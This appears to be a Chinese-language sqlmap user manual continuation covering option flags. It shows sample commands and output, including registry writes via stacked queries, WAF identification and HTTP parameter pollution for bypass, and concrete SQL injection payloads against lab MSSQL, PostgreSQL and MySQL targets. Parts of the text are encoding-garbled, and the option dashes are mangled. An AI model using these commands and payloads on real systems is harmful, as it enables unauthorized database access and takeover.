sqlmap用戶手冊(cè)[續(xù)篇]

ps：其實(shí)看到zone里很多問sqlmap的問題在通讀看完那篇文章后都能解決�？上О。�現(xiàn)在的人通讀看文章的耐心都沒有了，遇到了哪個(gè)問題就想起針對(duì)這個(gè)問題求助，卻不知道仔細(xì)看完之后，以后可以省多少時(shí)間來求助，吐槽完畢，正文開始：

對(duì)Windows注冊(cè)表操作
當(dāng)數(shù)據(jù)庫(kù)為MySQL，PostgreSQL或Microsoft SQL Server，并且當(dāng)前web應(yīng)用支持堆查詢。 當(dāng)然，當(dāng)前連接數(shù)據(jù)庫(kù)的用戶也需要有權(quán)限操作注冊(cè)表。

讀取注冊(cè)表值

參數(shù)：-reg-read

寫入注冊(cè)表值

參數(shù)：-reg-add

刪除注冊(cè)表值

參數(shù)：-reg-del

注冊(cè)表輔助選項(xiàng)

參數(shù)：-reg-key，-reg-value，-reg-data，-reg-type

需要配合之前三個(gè)參數(shù)使用，例子：

$ python sqlmap.py -u http://192.168.136.129/sqlmap/pgsql/get_int.aspx?id=1 --reg-add --reg-key="HKEY_LOCAL_MACHINESOFTWAREsqlmap" --reg-value=Test --reg-type=REG_SZ --reg-data=1
 
常規(guī)參數(shù)
從sqlite中讀取session

參數(shù)：-s

sqlmap對(duì)每一個(gè)目標(biāo)都會(huì)在output路徑下自動(dòng)生成一個(gè)SQLite文件，如果用戶想指定讀取的文件路徑，就可以用這個(gè)參數(shù)。

保存HTTP(S)日志

參數(shù)：-t

這個(gè)參數(shù)需要跟一個(gè)文本文件，sqlmap會(huì)把HTTP(S)請(qǐng)求與響應(yīng)的日志保存到那里。

非交互模式

參數(shù)：-batch

用此參數(shù)，不需要用戶輸入，將會(huì)使用sqlmap提示的默認(rèn)值一直運(yùn)行下去。

強(qiáng)制使用字符編碼

參數(shù)：-charset

不使用sqlmap自動(dòng)識(shí)別的（如HTTP頭中的Content-Type）字符編碼，強(qiáng)制指定字符編碼如：

--charset=GBK
爬行網(wǎng)站URL

參數(shù)：-crawl

sqlmap可以收集潛在的可能存在漏洞的連接，后面跟的參數(shù)是爬行的深度。

例子：

$ python sqlmap.py -u "http://192.168.21.128/sqlmap/mysql/" --batch --crawl=3
[...]
[xx:xx:53] [INFO] starting crawler
[xx:xx:53] [INFO] searching for links with depth 1
[xx:xx:53] [WARNING] running in a single-thread mode. This could take a while
[xx:xx:53] [INFO] searching for links with depth 2
[xx:xx:54] [INFO] heuristics detected web page charset 'ascii'
[xx:xx:00] [INFO] 42/56 links visited (75%)
[...]

規(guī)定輸出到CSV中的分隔符

參數(shù)：-csv-del

當(dāng)dump保存為CSV格式時(shí)（-dump-format=CSV），需要一個(gè)分隔符默認(rèn)是逗號(hào)，用戶也可以改為別的 如：

--csv-del=";"
 
DBMS身份驗(yàn)證

參數(shù)：-dbms-cred

某些時(shí)候當(dāng)前用戶的權(quán)限不夠，做某些操作會(huì)失敗，如果知道高權(quán)限用戶的密碼，可以使用此參數(shù)，有的數(shù)據(jù)庫(kù)有專門的運(yùn)行機(jī)制，可以切換用戶如Microsoft SQL Server的OPENROWSET函數(shù)

定義dump數(shù)據(jù)的格式

參數(shù)：-dump-format

輸出的格式可定義為：CSV，HTML，SQLITE

預(yù)估完成時(shí)間

參數(shù)：-eta

可以計(jì)算注入數(shù)據(jù)的剩余時(shí)間。

例如Oracle的布爾型盲注：

$ python sqlmap.py -u "http://192.168.136.131/sqlmap/oracle/get_int_bool.php?id=1" -b --eta

[...]
[hh:mm:01] [INFO] the back-end DBMS is Oracle
[hh:mm:01] [INFO] fetching banner
[hh:mm:01] [INFO] retrieving the length of query output
[hh:mm:01] [INFO] retrieved: 64
17% [========>                                          ] 11/64  ETA 00:19
 

然后：

100% [===================================================] 64/64
[hh:mm:53] [INFO] retrieved: Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - Prod

web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: Oracle
banner:    'Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - Prod'
 
sqlmap先輸出長(zhǎng)度，預(yù)計(jì)完成時(shí)間，顯示百分比，輸出字符

刷新session文件

參數(shù)：-flush-session

如果不想用之前緩存這個(gè)目標(biāo)的session文件，可以使用這個(gè)參數(shù)。 會(huì)清空之前的session，重新測(cè)試該目標(biāo)。

自動(dòng)獲取form表單測(cè)試

參數(shù)：-forms

如果你想對(duì)一個(gè)頁(yè)面的form表單中的參數(shù)測(cè)試，可以使用-r參數(shù)讀取請(qǐng)求文件，或者通過-data參數(shù)測(cè)試。 但是當(dāng)使用-forms參數(shù)時(shí)，sqlmap會(huì)自動(dòng)從-u中的url獲取頁(yè)面中的表單進(jìn)行測(cè)試。

忽略在會(huì)話文件中存儲(chǔ)的查詢結(jié)果

參數(shù)：-fresh-queries

忽略session文件保存的查詢，重新查詢。

使用DBMS的hex函數(shù)

參數(shù)：-hex

有時(shí)候字符編碼的問題，可能導(dǎo)致數(shù)據(jù)丟失，可以使用hex函數(shù)來避免：

針對(duì)PostgreSQL例子：

$ python sqlmap.py -u "http://192.168.48.130/sqlmap/pgsql/get_int.php?id=1" --banner --hex -v 3 --parse-errors

[...]
[xx:xx:14] [INFO] fetching banner
[xx:xx:14] [PAYLOAD] 1 AND 5849=CAST((CHR(58) CHR(118) CHR(116) CHR(106) CHR(58)) (ENCODE(CONVERT_TO((COALESCE(CAST(VERSION() AS CHARACTER(10000)),(CHR(32)))),(CHR(85) CHR(84) CHR(70) CHR(56))),(CHR(72) CHR(69) CHR(88))))::text (CHR(58) CHR(110) CHR(120) CHR(98) CHR(58)) AS NUMERIC)
[xx:xx:15] [INFO] parsed error message: 'pg_query() [<a href='function.pg-query'>function.pg-query</a>]: Query failed: ERROR:  invalid input syntax for type numeric: ":vtj:506f737467726553514c20382e332e39206f6e20693438362d70632d6c696e75782d676e752c20636f6d70696c656420627920474343206763632d342e332e7265616c202844656269616e2032e332e322d312e312920342e332e32:nxb:" in <b>/var/www/sqlmap/libs/pgsql.inc.php</b> on line <b>35</b>'
[xx:xx:15] [INFO] retrieved: PostgreSQL 8.3.9 on i486-pc-linux-gnu, compiled by
GCC gcc-4.3.real (Debian 4.3.2-1.1) 4.3.2
[...]
 
自定義輸出的路徑

參數(shù)：-output-dir

sqlmap默認(rèn)把session文件跟結(jié)果文件保存在output文件夾下，用此參數(shù)可自定義輸出路徑 例如：-output-dir=/tmp

從響應(yīng)中獲取DBMS的錯(cuò)誤信息

參數(shù)：-parse-errors

有時(shí)目標(biāo)沒有關(guān)閉DBMS的報(bào)錯(cuò)，當(dāng)數(shù)據(jù)庫(kù)語(yǔ)句錯(cuò)誤時(shí)，會(huì)輸出錯(cuò)誤語(yǔ)句，用詞參數(shù)可以會(huì)顯出錯(cuò)誤信息。

$ python sqlmap.py -u "http://192.168.21.129/sqlmap/mssql/iis/get_int.asp?id=1" --parse-errors
[...]
[11:12:17] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[11:12:17] [INFO] parsed error message: 'Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 10 is out of range of the number of items in the select list.
<b>/sqlmap/mssql/iis/get_int.asp, line 27</b>'
[11:12:17] [INFO] parsed error message: 'Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 6 is out of range of the number of items in the select list.
<b>/sqlmap/mssql/iis/get_int.asp, line 27</b>'
[11:12:17] [INFO] parsed error message: 'Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 4 is out of range of the number of items in the select list.
<b>/sqlmap/mssql/iis/get_int.asp, line 27</b>'
[11:12:17] [INFO] target URL appears to have 3 columns in query
[...]
 
其他的一些參數(shù)
使用參數(shù)縮寫

參數(shù)：-z

有使用參數(shù)太長(zhǎng)太復(fù)雜，可以使用縮寫模式。 例如：

python sqlmap.py --batch --random-agent --ignore-proxy --technique=BEU -u "www.target.com/vuln.php?id=1"
 
可以寫成：

python sqlmap.py -z "bat,randoma,ign,tec=BEU" -u "www.target.com/vuln.php?id=1"
 
還有：

python sqlmap.py --ignore-proxy --flush-session --technique=U --dump -D testdb -T users -u "www.target.com/vuln.php?id=1"
 
可以寫成：

python sqlmap.py -z "ign,flu,bat,tec=U,dump,D=testdb,T=users" -u "www.target.com/vuln.php?id=1"
 
成功SQL注入時(shí)警告

參數(shù)：-alert

設(shè)定會(huì)發(fā)的答案

參數(shù)：-answers

當(dāng)希望sqlmap提出輸入時(shí)，自動(dòng)輸入自己想要的答案可以使用此參數(shù)： 例子：

$ python sqlmap.py -u "http://192.168.22.128/sqlmap/mysql/get_int.php?id=1"--technique=E --answers="extending=N" --batch
[...]
[xx:xx:56] [INFO] testing for SQL injection on GET parameter 'id'
heuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
[xx:xx:56] [INFO] do you want to include all tests for 'MySQL' extending provided level (1) and risk (1)? [Y/n] N
[...]
 
發(fā)現(xiàn)SQL注入時(shí)發(fā)出蜂鳴聲

參數(shù)：-beep

發(fā)現(xiàn)sql注入時(shí)，發(fā)出蜂鳴聲。

啟發(fā)式檢測(cè)WAF/IPS/IDS保護(hù)

參數(shù)：-check-waf

WAF/IPS/IDS保護(hù)可能會(huì)對(duì)sqlmap造成很大的困擾，如果懷疑目標(biāo)有此防護(hù)的話，可以使用此參數(shù)來測(cè)試。 sqlmap將會(huì)使用一個(gè)不存在的參數(shù)來注入測(cè)試

例如：

&foobar=AND 1=1 UNION ALL SELECT 1,2,3,table_name FROM information_schema.tables WHERE 2>1
如果有保護(hù)的話可能返回結(jié)果會(huì)不同。

清理sqlmap的UDF(s)和表

參數(shù)：-cleanup

清除sqlmap注入時(shí)產(chǎn)生的udf與表。

禁用彩色輸出

參數(shù)：-desable-coloring

sqlmap默認(rèn)彩色輸出，可以使用此參數(shù)，禁掉彩色輸出。

使用指定的Google結(jié)果頁(yè)面

參數(shù)：-gpage

默認(rèn)sqlmap使用前100個(gè)URL地址作為注入測(cè)試，結(jié)合此選項(xiàng)，可以指定頁(yè)面的URL測(cè)試。

使用HTTP參數(shù)污染

參數(shù)：-hpp

HTTP參數(shù)污染可能會(huì)繞過WAF/IPS/IDS保護(hù)機(jī)制，這個(gè)對(duì)ASP/IIS與ASP.NET/IIS平臺(tái)很有效。

測(cè)試WAF/IPS/IDS保護(hù)

參數(shù)：-identify-waf

sqlmap可以嘗試找出WAF/IPS/IDS保護(hù)，方便用戶做出繞過方式。目前大約支持30種產(chǎn)品的識(shí)別。

例如對(duì)一個(gè)受到ModSecurity WAF保護(hù)的MySQL例子：

$ python sqlmap.py -u "http://192.168.21.128/sqlmap/mysql/get_int.php?id=1" --identify-waf -v 3
[...]
[xx:xx:23] [INFO] testing connection to the target URL
[xx:xx:23] [INFO] heuristics detected web page charset 'ascii'
[xx:xx:23] [INFO] using WAF scripts to detect backend WAF/IPS/IDS protection
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'USP Secure Entry Server (United Security Providers)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'BinarySEC Web Application Firewall (BinarySEC)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'NetContinuum Web Application Firewall (NetContinuum/Barracuda Networks)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Hyperguard Web Application Firewall (art of defence Inc.)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Cisco ACE XML Gateway (Cisco Systems)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'TrafficShield (F5 Networks)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Teros/Citrix Application Firewall Enterprise (Teros/Citrix Systems)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'KONA Security Solutions (Akamai Technologies)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Incapsula Web Application Firewall (Incapsula/Imperva)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'CloudFlare Web Application Firewall (CloudFlare)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Barracuda Web Application Firewall (Barracuda Networks)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'webApp.secure (webScurity)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Proventia Web Application Security (IBM)'
[xx:xx:23] [DEBUG] declared web page charset 'iso-8859-1'
[xx:xx:23] [DEBUG] page not found (404)
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'KS-WAF (Knownsec)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'NetScaler (Citrix Systems)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Jiasule Web Application Firewall (Jiasule)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'WebKnight Application Firewall (AQTRONIX)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'AppWall (Radware)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'ModSecurity: Open Source Web Application Firewall (Trustwave)'
[xx:xx:23] [CRITICAL] WAF/IDS/IPS identified 'ModSecurity: Open Source Web Application Firewall (Trustwave)'. Please consider usage of tamper scripts (option '--tamper')
[...]
 
模仿智能手機(jī)

參數(shù)：-mobile

有時(shí)服務(wù)端只接收移動(dòng)端的訪問，此時(shí)可以設(shè)定一個(gè)手機(jī)的User-Agent來模仿手機(jī)登陸。

例如：

$ python sqlmap.py -u "http://www.target.com/vuln.php?id=1" --mobile
[...]
which smartphone do you want sqlmap to imitate through HTTP User-Agent header?
[1] Apple iPhone 4s (default)
[2] BlackBerry 9900
[3] Google Nexus 7
[4] HP iPAQ 6365
[5] HTC Sensation
[6] Nokia N97
[7] Samsung Galaxy S
> 1
[...]
 
安全的刪除output目錄的文件

參數(shù)：-purge-output

有時(shí)需要?jiǎng)h除結(jié)果文件，而不被恢復(fù)，可以使用此參數(shù)，原有文件將會(huì)被隨機(jī)的一些文件覆蓋。

例如：

$ python sqlmap.py --purge-output -v 3
[...]
[xx:xx:55] [INFO] purging content of directory '/home/user/sqlmap/output'...
[xx:xx:55] [DEBUG] changing file attributes
[xx:xx:55] [DEBUG] writing random data to files
[xx:xx:55] [DEBUG] truncating files
[xx:xx:55] [DEBUG] renaming filenames to random values
[xx:xx:55] [DEBUG] renaming directory names to random values
[xx:xx:55] [DEBUG] deleting the whole directory tree
[...]
 
啟發(fā)式判斷注入

參數(shù)：-smart

有時(shí)對(duì)目標(biāo)非常多的URL進(jìn)行測(cè)試，為節(jié)省時(shí)間，只對(duì)能夠快速判斷為注入的報(bào)錯(cuò)點(diǎn)進(jìn)行注入，可以使用此參數(shù)。

例子：

$ python sqlmap.py -u "http://192.168.21.128/sqlmap/mysql/get_int.php?ca=17&user=foo&id=1" --batch --smart
[...]
[xx:xx:14] [INFO] testing if GET parameter 'ca' is dynamic
[xx:xx:14] [WARNING] GET parameter 'ca' does not appear dynamic
[xx:xx:14] [WARNING] heuristic (basic) test shows that GET parameter 'ca' might not be injectable
[xx:xx:14] [INFO] skipping GET parameter 'ca'
[xx:xx:14] [INFO] testing if GET parameter 'user' is dynamic
[xx:xx:14] [WARNING] GET parameter 'user' does not appear dynamic
[xx:xx:14] [WARNING] heuristic (basic) test shows that GET parameter 'user' might not be injectable
[xx:xx:14] [INFO] skipping GET parameter 'user'
[xx:xx:14] [INFO] testing if GET parameter 'id' is dynamic
[xx:xx:14] [INFO] confirming that GET parameter 'id' is dynamic
[xx:xx:14] [INFO] GET parameter 'id' is dynamic
[xx:xx:14] [WARNING] reflective value(s) found and filtering out
[xx:xx:14] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[xx:xx:14] [INFO] testing for SQL injection on GET parameter 'id'
heuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
do you want to include all tests for 'MySQL' extending provided level (1) and risk (1)? [Y/n] Y
[xx:xx:14] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[xx:xx:14] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
[xx:xx:14] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[xx:xx:14] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable
[xx:xx:14] [INFO] testing 'MySQL inline queries'
[xx:xx:14] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[xx:xx:14] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[xx:xx:14] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[xx:xx:24] [INFO] GET parameter 'id' is 'MySQL > 5.0.11 AND time-based blind' injectable
[xx:xx:24] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[xx:xx:24] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other potential injection technique found
[xx:xx:24] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[xx:xx:24] [INFO] target URL appears to have 3 columns in query
[xx:xx:24] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
[...]
 
初級(jí)用戶向?qū)�參�?shù)

參數(shù)：-wizard 面向初級(jí)用戶的參數(shù)，可以一步一步教你如何輸入針對(duì)目標(biāo)注入。

$ python sqlmap.py --wizard

    sqlmap/1.0-dev-2defc30 - automatic SQL injection and database takeover tool

http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 11:25:26

Please enter full target URL (-u): http://192.168.21.129/sqlmap/mssql/iis/get_int.asp?id=1
POST data (--data) [Enter for None]:
Injection difficulty (--level/--risk). Please choose:
[1] Normal (default)
[2] Medium
[3] Hard
> 1
Enumeration (--banner/--current-user/etc). Please choose:
[1] Basic (default)
[2] Smart
[3] All
> 1

sqlmap is running, please wait..

heuristic (parsing) test showed that the back-end DBMS could be 'Microsoft SQL Server'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
do you want to include all tests for 'Microsoft SQL Server' extending provided level (1) and risk (1)? [Y/n] Y
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection points with a total of 25 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 2986=2986

    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: id=1 AND 4847=CONVERT(INT,(CHAR(58) CHAR(118) CHAR(114) CHAR(100) CHAR(58) (SELECT (CASE WHEN (4847=4847) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(111) CHAR(109) CHAR(113) CHAR(58)))

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=1 UNION ALL SELECT NULL,NULL,CHAR(58) CHAR(118) CHAR(114) CHAR(100) CHAR(58) CHAR(70) CHAR(79) CHAR(118) CHAR(106) CHAR(87) CHAR(101) CHAR(119) CHAR(115) CHAR(114) CHAR(77) CHAR(58) CHAR(111) CHAR(109) CHAR(113) CHAR(58)--

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: id=1; WAITFOR DELAY '0:0:5'--

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: id=1 WAITFOR DELAY '0:0:5'--

    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: id=(SELECT CHAR(58) CHAR(118) CHAR(114) CHAR(100) CHAR(58) (SELECT (CASE WHEN (6382=6382) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(111) CHAR(109) CHAR(113) CHAR(58))
---
web server operating system: Windows XP
web application technology: ASP, Microsoft IIS 5.1
back-end DBMS operating system: Windows XP Service Pack 2
back-end DBMS: Microsoft SQL Server 2005
banner:
---
Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86)
    Oct 14 2005 00:33:37
    Copyright (c) 1988-2005 Microsoft Corporation
    Express Edition on Windows NT 5.1 (Build 2600: Service Pack 2)
---
current user:    'sa'
current database:    'testdb'
current user is DBA:    True

[*] shutting down at 11:25:52
link:http://drops.wooyun.org/tips/401